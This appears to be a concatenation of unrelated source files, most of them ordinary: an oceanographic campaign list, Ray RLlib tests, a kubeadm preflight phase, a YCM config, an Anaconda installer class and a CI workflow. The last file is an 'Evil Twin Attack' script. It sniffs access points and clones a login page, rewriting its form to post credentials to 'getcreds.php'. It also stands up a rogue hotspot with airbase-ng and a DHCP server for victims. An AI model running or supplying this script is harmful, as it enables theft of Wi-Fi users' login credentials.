        # TODO: parse ios_url, which is in fact a manifest
        video_url = video_info['mp4_url']
        return {
            'id': video_id,
            'url': video_url,
            'title': title,
            'thumbnail': video_info.get('thumbnail_url'),
        }
|
unknown
|
codeparrot/codeparrot-clean
| ||
# File: mbari_campaigns.py
#
# Create a symbolic link named campaigns.py to tell the Django server
# to serve these databases: ln -s mbari_campaigns.py campaigns.py.
# The stoqs/loaders/load.py script uses the load commands associated
# with each database to execute the load and record the provenance.
# Execute 'stoqs/loaders/load.py --help' for more information.
from collections import OrderedDict
# Keys are database (campaign) names, values are paths to load script
# for each campaign starting at the stoqs/loaders directory. The full
# path of 'stoqs/loaders/' is prepended to the value and then executed.
# Keys are database (campaign) names; values are loader invocations relative
# to stoqs/loaders (see the header comment). OrderedDict preserves insertion
# order — presumably roughly chronological; confirm before relying on it.
campaigns = OrderedDict([
    ('stoqs_rovctd_mb', 'ROVCTD/loadMB_Dives.sh'),
    ('stoqs_rovctd_mw93', 'ROVCTD/loadAllTransectDives.sh'),
    ('stoqs_rovctd_mw97', 'ROVCTD/loadTransectDives_mw97.sh'),
    ('stoqs_oceansites_o', 'OceanSITES/load_moorings.py -o'),
    ('stoqs_rovctd_goc', 'ROVCTD/loadGoC_Dives.sh'),
    ('stoqs_september2010', 'CANON/loadCANON_september2010.py'),
    ('stoqs_october2010', 'CANON/loadCANON_october2010.py'),
    ('stoqs_dorado2009', 'MolecularEcology/load_dorado2009.py'),
    ('stoqs_dorado2011', 'MolecularEcology/load_dorado2011.py'),
    ('stoqs_april2011', 'CANON/loadCANON_april2011.py'),
    ('stoqs_june2011', 'CANON/loadCANON_june2011.py'),
    ('stoqs_september2011', 'CANON/loadCANON_september2011.py'),
    ('stoqs_february2012', 'MolecularEcology/loadGOC_february2012.py'),
    ('stoqs_may2012', 'CANON/loadCANON_may2012.py'),
    ('stoqs_september2012', 'CANON/loadCANON_september2012.py'),
    ('stoqs_ioos_gliders', 'IOOS/load_gliders.py'),
    ('stoqs_march2013', 'CANON/loadCANON_march2013.py'),
    ('stoqs_march2013_o', 'CANON/loadCANON_march2013.py -o'),
    ('stoqs_beds_canyon_events', 'BEDS/loadBEDS_CanyonEvents.py'),
    ('stoqs_simz_aug2013', 'MolecularEcology/loadSIMZ_aug2013.py'),
    ('stoqs_september2013', 'CANON/loadCANON_september2013.py'),
    ('stoqs_september2013_o', 'CANON/loadCANON_september2013.py -o'),
    ('stoqs_cn13id_oct2013', 'CANON/loadCN13ID_october2013.py'),
    ('stoqs_simz_oct2013', 'MolecularEcology/loadSIMZ_oct2013.py'),
    ('stoqs_simz_spring2014', 'MolecularEcology/loadSIMZ_spring2014.py'),
    ('stoqs_canon_april2014', 'CANON/loadCANON_april2014.py'),
    ('stoqs_simz_jul2014', 'MolecularEcology/loadSIMZ_jul2014.py'),
    ('stoqs_september2014', 'CANON/loadCANON_september2014.py'),
    ('stoqs_simz_oct2014', 'MolecularEcology/loadSIMZ_oct2014.py'),
    ('stoqs_canon_may2015', 'CANON/loadCANON_may2015.py'),
    ('stoqs_os2015', 'CANON/loadCANON_os2015.py'),
    ('stoqs_canon_september2015', 'CANON/loadCANON_september2015.py'),
    ('stoqs_os2016', 'CANON/loadCANON_os2016.py'),
    ('stoqs_cce2015', 'CCE/loadCCE_2015.py'),
    ('stoqs_michigan2016', 'LakeMichigan/load_2016.py'),
    ('stoqs_canon_september2016', 'CANON/loadCANON_september2016.py'),
    ('stoqs_os2017', 'CANON/loadCANON_os2017.py'),
    ('stoqs_canon_april2017', 'CANON/loadCANON_april2017.py'),
    ('stoqs_ps2017', 'CANON/loadCANON_postSeason2017.py'),
    ('stoqs_canon_september2017', 'CANON/loadCANON_september2017.py'),
    ('stoqs_os2018', 'CANON/loadCANON_os2018.py'),
    ('stoqs_canon_may2018', 'CANON/loadCANON_may2018.py'),
    ('stoqs_all_dorado', 'PlanktonProxies/load_all_dorado.py'),
    ('stoqs_canon_september2018', 'CANON/loadCANON_september2018.py'),
])
|
unknown
|
codeparrot/codeparrot-clean
| ||
import gym
import numpy as np
import random
import unittest
import uuid
import ray
from ray.rllib.agents.dqn import DQNTrainer
from ray.rllib.agents.pg import PGTrainer
from ray.rllib.evaluation.rollout_worker import RolloutWorker
from ray.rllib.env.external_env import ExternalEnv
from ray.rllib.tests.test_rollout_worker import (BadPolicy, MockPolicy,
MockEnv)
from ray.rllib.utils.test_utils import framework_iterator
from ray.tune.registry import register_env
def make_simple_serving(multiagent, superclass):
    """Build a SimpleServing class on top of *superclass*.

    The returned class wraps a gym-style env and serves it through the
    ExternalEnv protocol: query an action, step, log the reward, and
    roll over to a new episode whenever the env reports done.
    ``multiagent`` only controls whether ``info`` is forwarded along
    with the reward (the single-agent API accepts it, the multi-agent
    one does not).
    """
    class SimpleServing(superclass):
        def __init__(self, env):
            superclass.__init__(self, env.action_space, env.observation_space)
            self.env = env
        def run(self):
            episode_id = self.start_episode()
            observation = self.env.reset()
            while True:
                chosen = self.get_action(episode_id, observation)
                observation, rew, finished, step_info = self.env.step(chosen)
                # Multi-agent log_returns has no info kwarg.
                if multiagent:
                    self.log_returns(episode_id, rew)
                else:
                    self.log_returns(episode_id, rew, info=step_info)
                if finished:
                    self.end_episode(episode_id, observation)
                    observation = self.env.reset()
                    episode_id = self.start_episode()
    return SimpleServing
# Generate the single-agent (multiagent=False) SimpleServing variant on top
# of ExternalEnv; used by the RolloutWorker/Trainer tests below.
SimpleServing = make_simple_serving(False, ExternalEnv)
class PartOffPolicyServing(ExternalEnv):
    """ExternalEnv that acts off-policy a fixed fraction of the time.

    With probability ``off_pol_frac`` a random action is sampled and
    reported via ``log_action``; otherwise the served policy is queried
    via ``get_action``.
    """
    def __init__(self, env, off_pol_frac):
        ExternalEnv.__init__(self, env.action_space, env.observation_space)
        self.env = env
        self.off_pol_frac = off_pol_frac
    def run(self):
        episode_id = self.start_episode()
        observation = self.env.reset()
        while True:
            if random.random() < self.off_pol_frac:
                # Off-policy branch: take a random action but still
                # report it so the sampler sees what was executed.
                chosen = self.env.action_space.sample()
                self.log_action(episode_id, observation, chosen)
            else:
                chosen = self.get_action(episode_id, observation)
            observation, rew, finished, step_info = self.env.step(chosen)
            self.log_returns(episode_id, rew, info=step_info)
            if finished:
                self.end_episode(episode_id, observation)
                observation = self.env.reset()
                episode_id = self.start_episode()
class SimpleOffPolicyServing(ExternalEnv):
    """ExternalEnv that always executes one caller-supplied action.

    Fully off-policy: the served policy is never queried; the fixed
    action is reported through ``log_action`` on every step.
    """
    def __init__(self, env, fixed_action):
        ExternalEnv.__init__(self, env.action_space, env.observation_space)
        self.env = env
        self.fixed_action = fixed_action
    def run(self):
        episode_id = self.start_episode()
        observation = self.env.reset()
        while True:
            taken = self.fixed_action
            self.log_action(episode_id, observation, taken)
            observation, rew, finished, step_info = self.env.step(taken)
            self.log_returns(episode_id, rew, info=step_info)
            if finished:
                self.end_episode(episode_id, observation)
                observation = self.env.reset()
                episode_id = self.start_episode()
class MultiServing(ExternalEnv):
    """Serves five concurrent env copies through one ExternalEnv.

    Each iteration picks two of the five envs at random, starts
    episodes lazily for envs without a pending observation, and steps
    the picked envs with actions from the served policy.
    """
    def __init__(self, env_creator):
        self.env_creator = env_creator
        self.env = env_creator()
        ExternalEnv.__init__(self, self.env.action_space,
                             self.env.observation_space)
    def run(self):
        pool = [self.env_creator() for _ in range(5)]
        latest_obs = {}
        episode_ids = {}
        while True:
            picked = np.random.choice(range(5), 2, replace=False)
            for idx in picked:
                # An env with no pending observation needs a fresh episode.
                if idx not in latest_obs:
                    episode_ids[idx] = uuid.uuid4().hex
                    self.start_episode(episode_id=episode_ids[idx])
                    latest_obs[idx] = pool[idx].reset()
            chosen = [
                self.get_action(episode_ids[idx], latest_obs[idx])
                for idx in picked
            ]
            for idx, act in zip(picked, chosen):
                obs, rew, finished, _ = pool[idx].step(act)
                latest_obs[idx] = obs
                self.log_returns(episode_ids[idx], rew)
                if finished:
                    self.end_episode(episode_ids[idx], obs)
                    # Dropping the obs makes the next pick restart it.
                    del latest_obs[idx]
class TestExternalEnv(unittest.TestCase):
    """End-to-end sampling/training tests for the ExternalEnv serving API."""
    @classmethod
    def setUpClass(cls) -> None:
        # One shared ray cluster for all tests in this class.
        ray.init(ignore_reinit_error=True)
    @classmethod
    def tearDownClass(cls) -> None:
        ray.shutdown()
    def test_external_env_complete_episodes(self):
        """complete_episodes mode rounds each sample up to whole episodes."""
        # NOTE(review): MockEnv(25) presumably ends episodes after 25 steps,
        # so a 40-step fragment is padded to two full episodes (50) — confirm
        # against MockEnv's definition.
        ev = RolloutWorker(
            env_creator=lambda _: SimpleServing(MockEnv(25)),
            policy=MockPolicy,
            rollout_fragment_length=40,
            batch_mode="complete_episodes")
        for _ in range(3):
            batch = ev.sample()
            self.assertEqual(batch.count, 50)
    def test_external_env_truncate_episodes(self):
        """truncate_episodes mode yields exactly rollout_fragment_length steps."""
        ev = RolloutWorker(
            env_creator=lambda _: SimpleServing(MockEnv(25)),
            policy=MockPolicy,
            rollout_fragment_length=40,
            batch_mode="truncate_episodes")
        for _ in range(3):
            batch = ev.sample()
            self.assertEqual(batch.count, 40)
    def test_external_env_off_policy(self):
        """Actions reported via log_action show up verbatim in sampled batches."""
        ev = RolloutWorker(
            env_creator=lambda _: SimpleOffPolicyServing(MockEnv(25), 42),
            policy=MockPolicy,
            rollout_fragment_length=40,
            batch_mode="complete_episodes")
        for _ in range(3):
            batch = ev.sample()
            self.assertEqual(batch.count, 50)
            # The env always logs the fixed action 42.
            self.assertEqual(batch["actions"][0], 42)
            self.assertEqual(batch["actions"][-1], 42)
    def test_external_env_bad_actions(self):
        """A policy producing bad actions surfaces as an error from sample()."""
        ev = RolloutWorker(
            env_creator=lambda _: SimpleServing(MockEnv(25)),
            policy=BadPolicy,
            sample_async=True,
            rollout_fragment_length=40,
            batch_mode="truncate_episodes")
        self.assertRaises(Exception, lambda: ev.sample())
    def test_train_cartpole_off_policy(self):
        """DQN still reaches reward 80 when 20% of actions are off-policy."""
        register_env(
            "test3", lambda _: PartOffPolicyServing(
                gym.make("CartPole-v0"), off_pol_frac=0.2))
        config = {
            "num_workers": 0,
            "exploration_config": {
                "epsilon_timesteps": 100
            },
        }
        for _ in framework_iterator(config, frameworks=("tf", "torch")):
            dqn = DQNTrainer(env="test3", config=config)
            reached = False
            for i in range(50):
                result = dqn.train()
                print("Iteration {}, reward {}, timesteps {}".format(
                    i, result["episode_reward_mean"],
                    result["timesteps_total"]))
                if result["episode_reward_mean"] >= 80:
                    reached = True
                    break
            if not reached:
                raise Exception("failed to improve reward")
    def test_train_cartpole(self):
        """PG reaches mean reward 80 on CartPole served through ExternalEnv."""
        register_env("test", lambda _: SimpleServing(gym.make("CartPole-v0")))
        config = {"num_workers": 0}
        for _ in framework_iterator(config, frameworks=("tf", "torch")):
            pg = PGTrainer(env="test", config=config)
            reached = False
            for i in range(80):
                result = pg.train()
                print("Iteration {}, reward {}, timesteps {}".format(
                    i, result["episode_reward_mean"],
                    result["timesteps_total"]))
                if result["episode_reward_mean"] >= 80:
                    reached = True
                    break
            if not reached:
                raise Exception("failed to improve reward")
    def test_train_cartpole_multi(self):
        """Same as test_train_cartpole, but with five envs via MultiServing."""
        register_env("test2",
                     lambda _: MultiServing(lambda: gym.make("CartPole-v0")))
        config = {"num_workers": 0}
        for _ in framework_iterator(config, frameworks=("tf", "torch")):
            pg = PGTrainer(env="test2", config=config)
            reached = False
            for i in range(80):
                result = pg.train()
                print("Iteration {}, reward {}, timesteps {}".format(
                    i, result["episode_reward_mean"],
                    result["timesteps_total"]))
                if result["episode_reward_mean"] >= 80:
                    reached = True
                    break
            if not reached:
                raise Exception("failed to improve reward")
    def test_external_env_horizon_not_supported(self):
        """Setting episode_horizon with an ExternalEnv raises ValueError."""
        ev = RolloutWorker(
            env_creator=lambda _: SimpleServing(MockEnv(25)),
            policy=MockPolicy,
            episode_horizon=20,
            rollout_fragment_length=10,
            batch_mode="complete_episodes")
        self.assertRaises(ValueError, lambda: ev.sample())
if __name__ == "__main__":
    import pytest
    import sys
    # Delegate to pytest so the process exit code reflects test results.
    sys.exit(pytest.main(["-v", __file__]))
|
unknown
|
codeparrot/codeparrot-clean
| ||
/*
Copyright 2019 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package phases
import (
"fmt"
"k8s.io/klog/v2"
"k8s.io/kubernetes/cmd/kubeadm/app/cmd/options"
"k8s.io/kubernetes/cmd/kubeadm/app/cmd/phases/workflow"
"k8s.io/kubernetes/cmd/kubeadm/app/cmd/util"
"k8s.io/kubernetes/cmd/kubeadm/app/preflight"
"k8s.io/kubernetes/cmd/kubeadm/app/util/errors"
)
// NewPreflightPhase creates a kubeadm workflow phase implements preflight checks for reset
func NewPreflightPhase() workflow.Phase {
	// Flags this phase inherits from the parent "reset" command.
	inherited := []string{
		options.IgnorePreflightErrors,
		options.Force,
		options.DryRun,
	}
	return workflow.Phase{
		Name:         "preflight",
		Aliases:      []string{"pre-flight"},
		Short:        "Run reset pre-flight checks",
		Long:         "Run pre-flight checks for kubeadm reset.",
		Run:          runPreflight,
		InheritFlags: inherited,
	}
}
// runPreflight executes preflight checks logic.
// It expects the workflow RunData to implement resetData; unless --force or
// --dry-run was given it first asks the user for interactive confirmation.
func runPreflight(c workflow.RunData) error {
	r, ok := c.(resetData)
	if !ok {
		return errors.New("preflight phase invoked with an invalid data struct")
	}
	// Confirmation step is skipped for forced and dry-run resets.
	if !r.ForceReset() && !r.DryRun() {
		klog.Warning("[reset] WARNING: Changes made to this host by 'kubeadm init' or 'kubeadm join' will be reverted.")
		if err := util.InteractivelyConfirmAction("reset", "Are you sure you want to proceed?", r.InputReader()); err != nil {
			return err
		}
	}
	fmt.Println("[preflight] Running pre-flight checks")
	// Root-only checks; errors named in --ignore-preflight-errors are tolerated.
	return preflight.RunRootCheckOnly(r.IgnorePreflightErrors())
}
|
go
|
github
|
https://github.com/kubernetes/kubernetes
|
cmd/kubeadm/app/cmd/phases/reset/preflight.go
|
import os
import ycm_core
# These are the compilation flags that will be used in case there's no
# compilation database set (by default, one is not set).
# CHANGE THIS LIST OF FLAGS. YES, THIS IS THE DROID YOU HAVE BEEN LOOKING FOR.
flags = [
'-Wall',
'-Werror',
# Fixed: was '-pendantic-errors', a typo clang rejects as an unknown
# argument; the real diagnostic flag is '-pedantic-errors'.
'-pedantic-errors',
'-std=c++0x',
'-fno-strict-aliasing',
'-O3',
'-DNDEBUG',
# ...and the same thing goes for the magic -x option which specifies the
# language that the files to be compiled are written in. This is mostly
# relevant for c++ headers.
# For a C project, you would set this to 'c' instead of 'c++'.
'-x', 'c++',
'-I', 'include',
'-isystem', '/usr/include',
'-isystem', '/usr/local/include',
]
# Set this to the absolute path to the folder (NOT the file!) containing the
# compile_commands.json file to use that instead of 'flags'. See here for
# more details: http://clang.llvm.org/docs/JSONCompilationDatabase.html
#
# Most projects will NOT need to set this to anything; you can just change the
# 'flags' list of compilation flags. Notice that YCM itself uses that approach.
compilation_database_folder = ''
# An empty path never exists, so 'database' stays None unless the folder
# above is filled in; FlagsForFile branches on that.
if os.path.exists( compilation_database_folder ):
  database = ycm_core.CompilationDatabase( compilation_database_folder )
else:
  database = None
# Source extensions probed when looking up flags for a header file.
SOURCE_EXTENSIONS = [ '.cc' ]
def DirectoryOfThisScript():
  """Return the absolute path of the directory containing this script."""
  here = os.path.abspath( __file__ )
  return os.path.dirname( here )
def MakeRelativePathsInFlagsAbsolute( flags, working_directory ):
  """Rewrite relative include-path flags as absolute paths.

  Handles both the two-token form (``-I path``) and the joined form
  (``-Ipath``); all other flags pass through unchanged. Without a
  working directory, a shallow copy of the flags is returned.
  """
  if not working_directory:
    return list( flags )
  path_option_prefixes = [ '-isystem', '-I', '-iquote', '--sysroot=' ]
  absolute_flags = []
  pending_path = False
  for original in flags:
    rewritten = original
    if pending_path:
      # Previous token was a bare path option; this token is its path.
      pending_path = False
      if not original.startswith( '/' ):
        rewritten = os.path.join( working_directory, original )
    for prefix in path_option_prefixes:
      if original == prefix:
        pending_path = True
        break
      if original.startswith( prefix ):
        # Path is glued onto the option itself (e.g. -Iinclude).
        rewritten = prefix + os.path.join(
            working_directory, original[ len( prefix ): ] )
        break
    if rewritten:
      absolute_flags.append( rewritten )
  return absolute_flags
def IsHeaderFile( filename ):
  """Return True if *filename* has a C/C++ header extension."""
  return os.path.splitext( filename )[ 1 ] in [ '.h', '.hxx', '.hpp', '.hh' ]
def GetCompilationInfoForFile( filename ):
  """Look up compilation info for *filename* in the database.

  CMake's compile_commands.json has no entries for header files, so for
  a header we probe sibling source files (same basename, extensions from
  SOURCE_EXTENSIONS) and borrow their flags when available. Returns None
  when no usable entry is found for a header.
  """
  if not IsHeaderFile( filename ):
    return database.GetCompilationInfoForFile( filename )
  root = os.path.splitext( filename )[ 0 ]
  for source_ext in SOURCE_EXTENSIONS:
    candidate = root + source_ext
    if not os.path.exists( candidate ):
      continue
    info = database.GetCompilationInfoForFile( candidate )
    if info.compiler_flags_:
      return info
  return None
def FlagsForFile( filename, **kwargs ):
  """YCM entry point: return the flags dict for *filename*, or None."""
  if not database:
    # No compilation database: serve the static 'flags' list, resolved
    # relative to this script's directory.
    return {
      'flags': MakeRelativePathsInFlagsAbsolute( flags,
                                                 DirectoryOfThisScript() ),
      'do_cache': True
    }
  # Bear in mind that compilation_info.compiler_flags_ does NOT return a
  # python list, but a "list-like" StringVec object.
  info = GetCompilationInfoForFile( filename )
  if not info:
    return None
  return {
    'flags': MakeRelativePathsInFlagsAbsolute( info.compiler_flags_,
                                               info.compiler_working_dir_ ),
    'do_cache': True
  }
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/python
#
# anaconda: The Red Hat Linux Installation program
#
# Copyright (C) 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007
# Red Hat, Inc. All rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Author(s): Brent Fox <bfox@redhat.com>
# Mike Fulbright <msf@redhat.com>
# Jakub Jelinek <jakub@redhat.com>
# Jeremy Katz <katzj@redhat.com>
# Chris Lumens <clumens@redhat.com>
# Paul Nasrat <pnasrat@redhat.com>
# Erik Troan <ewt@rpath.com>
# Matt Wilson <msw@rpath.com>
#
import os
import sys
from tempfile import mkstemp
from pyanaconda.bootloader import get_bootloader
from pyanaconda import iutil
from pyanaconda.constants import ADDON_PATHS
from pyanaconda import addons
import logging
log = logging.getLogger("anaconda")
stdoutLog = logging.getLogger("anaconda.stdout")
class Anaconda(object):
    """Top-level installer state object (Python 2 era anaconda).

    Mostly a bag of attributes populated by the installer entry point,
    plus lazily-constructed singletons exposed as properties
    (bootloader, instClass, payload, storage).
    """
    def __init__(self):
        from pyanaconda import desktop
        self._bootloader = None
        self.canReIPL = False
        self.desktop = desktop.Desktop()
        self.dir = None
        self.displayMode = None
        self.extraModules = []
        self.id = None
        self._instClass = None
        self._intf = None
        self.isHeadless = False
        self.ksdata = None
        self.mediaDevice = None
        self.methodstr = None
        self._network = None
        self.opts = None
        self._payload = None
        self.proxy = None
        self.proxyUsername = None
        self.proxyPassword = None
        self.reIPLMessage = None
        self.rescue_mount = True
        self.rootParts = None
        self.stage2 = None
        self._storage = None
        self.updateSrc = None
        self.mehConfig = None
        # *sigh* we still need to be able to write this out
        self.xdriver = None
    @property
    def bootloader(self):
        """Lazily create and cache the platform's bootloader object."""
        if not self._bootloader:
            self._bootloader = get_bootloader()
        return self._bootloader
    @property
    def instClass(self):
        """Install class in use; falls back to DefaultInstall on first access."""
        if not self._instClass:
            from pyanaconda.installclass import DefaultInstall
            self._instClass = DefaultInstall()
        return self._instClass
    def _getInterface(self):
        return self._intf
    def _setInterface(self, v):
        # "lambda cannot contain assignment"
        self._intf = v
    def _delInterface(self):
        del self._intf
    # Read/write/delete access to the active user-interface object.
    intf = property(_getInterface, _setInterface, _delInterface)
    @property
    def payload(self):
        # Try to find the packaging payload class. First try the install
        # class. If it doesn't give us one, fall back to the default.
        # Selection order below: ostree kickstart setup, live CD install,
        # "liveimg" kickstart method, then plain yum.
        if not self._payload:
            klass = self.instClass.getBackend()
            if not klass:
                from pyanaconda.flags import flags
                if self.ksdata.ostreesetup.seen:
                    from pyanaconda.packaging.rpmostreepayload import RPMOSTreePayload
                    klass = RPMOSTreePayload
                elif flags.livecdInstall:
                    from pyanaconda.packaging.livepayload import LiveImagePayload
                    klass = LiveImagePayload
                elif self.ksdata.method.method == "liveimg":
                    from pyanaconda.packaging.livepayload import LiveImageKSPayload
                    klass = LiveImageKSPayload
                else:
                    from pyanaconda.packaging.yumpayload import YumPayload
                    klass = YumPayload
            self._payload = klass(self.ksdata)
        return self._payload
    @property
    def protected(self):
        """Device specs that must be left alone during partitioning.

        Includes the live boot device (if one is present) and any hd:
        install sources referenced by methodstr/stage2.
        """
        import stat
        specs = []
        if os.path.exists("/run/initramfs/livedev") and \
           stat.S_ISBLK(os.stat("/run/initramfs/livedev")[stat.ST_MODE]):
            specs.append(os.readlink("/run/initramfs/livedev"))
        if self.methodstr and self.methodstr.startswith("hd:"):
            specs.append(self.methodstr[3:].split(":", 3)[0])
        if self.stage2 and self.stage2.startswith("hd:"):
            specs.append(self.stage2[3:].split(":", 3)[0])
        return specs
    @property
    def storage(self):
        """Lazily create the blivet storage object from kickstart data."""
        if not self._storage:
            import blivet
            self._storage = blivet.Blivet(ksdata=self.ksdata)
            if self.instClass.defaultFS:
                self._storage.setDefaultFSType(self.instClass.defaultFS)
        return self._storage
    def dumpState(self):
        """Write a traceback + thread dump for crash reporting.

        Dumps to a unique /tmp/anaconda-tb-* file and also appends to
        the aggregate /tmp/anaconda-tb-all.log.
        """
        from meh import ExceptionInfo
        from meh.dump import ReverseExceptionDump
        from inspect import stack as _stack
        from traceback import format_stack
        # Skip the frames for dumpState and the signal handler.
        stack = _stack()[2:]
        stack.reverse()
        exn = ReverseExceptionDump(ExceptionInfo(None, None, stack),
                                   self.mehConfig)
        # gather up info on the running threads
        threads = "\nThreads\n-------\n"
        # Python 2 dict iteration (iteritems) over every live thread's frame.
        for thread_id, frame in sys._current_frames().iteritems():
            threads += "\nThread %s\n" % (thread_id,)
            threads += "".join(format_stack(frame))
        # dump to a unique file
        (fd, filename) = mkstemp(prefix="anaconda-tb-", dir="/tmp")
        dump_text = exn.traceback_and_object_dump(self)
        dump_text += threads
        dump_text = dump_text.encode("utf-8")
        os.write(fd, dump_text)
        os.close(fd)
        # append to a given file
        with open("/tmp/anaconda-tb-all.log", "a+") as f:
            f.write("--- traceback: %s ---\n" % filename)
            f.write(dump_text + "\n")
    def initInterface(self, addon_paths=None):
        """Create the GUI or TUI user interface per self.displayMode.

        Raises RuntimeError when called a second time or when
        displayMode is not one of 'g', 't', 'c'.
        """
        if self._intf:
            raise RuntimeError("Second attempt to initialize the InstallInterface")
        if self.displayMode == 'g':
            from pyanaconda.ui.gui import GraphicalUserInterface
            self._intf = GraphicalUserInterface(self.storage, self.payload,
                                                self.instClass)
            # needs to be refreshed now we know if gui or tui will take place
            addon_paths = addons.collect_addon_paths(ADDON_PATHS,
                                                     ui_subdir="gui")
        elif self.displayMode in ['t', 'c']: # text and command line are the same
            from pyanaconda.ui.tui import TextUserInterface
            self._intf = TextUserInterface(self.storage, self.payload,
                                           self.instClass)
            # needs to be refreshed now we know if gui or tui will take place
            addon_paths = addons.collect_addon_paths(ADDON_PATHS,
                                                     ui_subdir="tui")
        else:
            raise RuntimeError("Unsupported displayMode: %s" % self.displayMode)
        if addon_paths:
            self._intf.update_paths(addon_paths)
    def writeXdriver(self, root = None):
        """Write a minimal xorg.conf forcing self.xdriver, if one was set."""
        # this should go away at some point, but until it does, we
        # need to keep it around.
        if self.xdriver is None:
            return
        if root is None:
            root = iutil.getSysroot()
        if not os.path.isdir("%s/etc/X11" %(root,)):
            os.makedirs("%s/etc/X11" %(root,), mode=0755)
        f = open("%s/etc/X11/xorg.conf" %(root,), 'w')
        f.write('Section "Device"\n\tIdentifier "Videocard0"\n\tDriver "%s"\nEndSection\n' % self.xdriver)
        f.close()
|
unknown
|
codeparrot/codeparrot-clean
| ||
name: 🧪 Test
on:
push:
branches:
- main
- dev
tags-ignore:
- v*
paths-ignore:
- "docs/**"
- "**/README.md"
pull_request:
paths-ignore:
- "docs/**"
- "**/*.md"
concurrency:
group: ${{ github.workflow }}-${{ github.ref }}
cancel-in-progress: true
jobs:
test:
name: "🧪 Test: (Node: ${{ matrix.node }})"
strategy:
fail-fast: false
matrix:
node:
- 20.18
- 22
runs-on: ubuntu-latest
steps:
- name: ⬇️ Checkout repo
uses: actions/checkout@v6
- name: 📦 Setup pnpm
uses: pnpm/action-setup@v4
- name: ⎔ Setup node
uses: actions/setup-node@v6
with:
node-version: ${{ matrix.node }}
cache: pnpm
check-latest: true
      # TODO: Track and re-enable once this has been fixed: https://github.com/google/wireit/issues/1297
# - uses: google/wireit@setup-github-actions-caching/v2
- name: Disable GitHub Actions Annotations
run: |
echo "::remove-matcher owner=tsc::"
echo "::remove-matcher owner=eslint-compact::"
echo "::remove-matcher owner=eslint-stylish::"
- name: 📥 Install deps
run: pnpm install --frozen-lockfile
- name: 🏗 Build
run: pnpm build
- name: 🔍 Typecheck
run: pnpm typecheck
- name: 🔬 Lint
run: pnpm lint
- name: 🧪 Run tests
run: pnpm test
|
unknown
|
github
|
https://github.com/remix-run/react-router
|
.github/workflows/test.yml
|
from scapy.all import *
import os
import time
from subprocess import *
print '*'*20
print '*'*20
print 'Evil Twin Attack Reburn'
import create_db_hotspot
import urllib2, httplib, redirecthandle
####### SET UP A MONITORING INTERFACE
print '*'*20
print 'Creating a monitoring interface'
output = Popen(["iwconfig"], stdout=PIPE).communicate()[0]
wireless_interface = ""
mon_iface = ""
if "wlan" in output:
#print "The network inteface is: " + output[0:5]
wireless_interface = output[0:6].strip()
print "\n\n"
print "EVIL TWIN ATTACK"
print "\n\n"
print "Using wireless interface:::" + wireless_interface
print "\n\n"
mon_interface = Popen(["airmon-ng", "start", wireless_interface], stdout=PIPE).communicate()[0]
if 'mon' in mon_interface:
print mon_interface[-33:-1].strip()
mon_iface = mon_interface[-7:-2].strip(")")
print '*'*20
print "SCANNING FOR WIRELESS NETWORKS"
print '*'*20
print "press Ctrl+C to stop scanning"
######## SCAN FOR SSID
app_list = []
def PacketHandler(pkt):
if pkt.haslayer(Dot11):
if pkt.type == 0 and pkt.subtype==8:
if pkt.addr2 not in app_list:
app_list.append(pkt.addr2)
print "AP MAC: %s with SSID: %s " %(pkt.addr2, pkt.info)
sniff(iface=mon_iface, prn= PacketHandler)
######## making a backup of DHCPD
print '*'*20
print "making a backup of DHCPD"
os.system("mv /etc/dhcp/dhcpd.conf /etc/dhcp/dhcpd.conf.backup")
##### creating a DHCPD script
print '*'*20
print "creating a DHCPD script"
dhcpd_file = open("/etc/dhcp/dhcpd.conf", "wb")
dhcpd_file.write("authoritative;\ndefault-lease-time 600;\nmax-lease-time 7200;\nsubnet 192.168.1.128 netmask 255.255.255.128 {\n\toption subnet-mask 192.168.1.128;\n\toption broadcast-address 192.168.1.255;\n\toption routers 192.168.1.129;\n\toption domain-name-servers 8.8.8.8;\n\trange 192.168.1.130 192.168.1.140;\n}")
dhcpd_file.close()
# GET USER INPUT FOR SSID
SSID = raw_input('Enter the target SSID: ')
CHANNEL = raw_input('Enter the channel for SSID: ')
################ CONNECT TO WIRELESS NETWORK #########
def connect_wireless():
os.system("iwconfig "+wireless_interface+" essid " + SSID)
#os.system("sudo iw dev "+wireless_interface+" disconnect")
print '*'*20
print 'Connected to :' + SSID + ' on interface ' + wireless_interface
time.sleep(5)
####### HANDLE REDIRECT
def get_login_page():
httplib.HTTPConnection.debuglevel=1
request = urllib2.Request('https://gmail.com/')
opener = urllib2.build_opener(redirecthandle.SmartRedirectHandler())
f = opener.open(request)
#article = re.sub(r'(?is)</html>.+', '</html>', article)
redirect = f.url
#response = urllib2.urlopen('https://google.com')
html = f.read()
print "Found the login page here: " + f.url
########## regex search and replace
regex = re.search(r'action="([^"]*)".*?', html)
post_action = str(regex.group(0))
print "*" * 20
print 'modifying the login page...'
new_login = html.replace(post_action, 'action=getcreds.php')
##### create a login page
index_page = open('/var/www/index.html','wb')
index_page.write(new_login)
index_page.close()
time.sleep(10)
########## CONNECTING TO THE WIRELESS NETWORK
connect_wireless()
######## getting login page
print '*'*20
print 'Getting login page'
get_login_page()
os.system('firefox http://localhost/index.html &')
# CREATE A HOTSPOT IN A NEW TERMINAL
time.sleep(3)
print '*'*20
print "Creating a hotspot"
os.system("gnome-terminal -x airbase-ng -e '"+SSID+"' -c "+str(CHANNEL)+" -P "+mon_iface+" &")
internet_ip = raw_input('Enter the outbound IP address: ')
print '*'*20
print 'Setting up DHCP Server'
########### SETTING UP THE DHCPD SERVER
os.system("ifconfig at0 up")
os.system("ifconfig at0 192.168.1.129 netmask 255.255.255.128")
os.system("route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129")
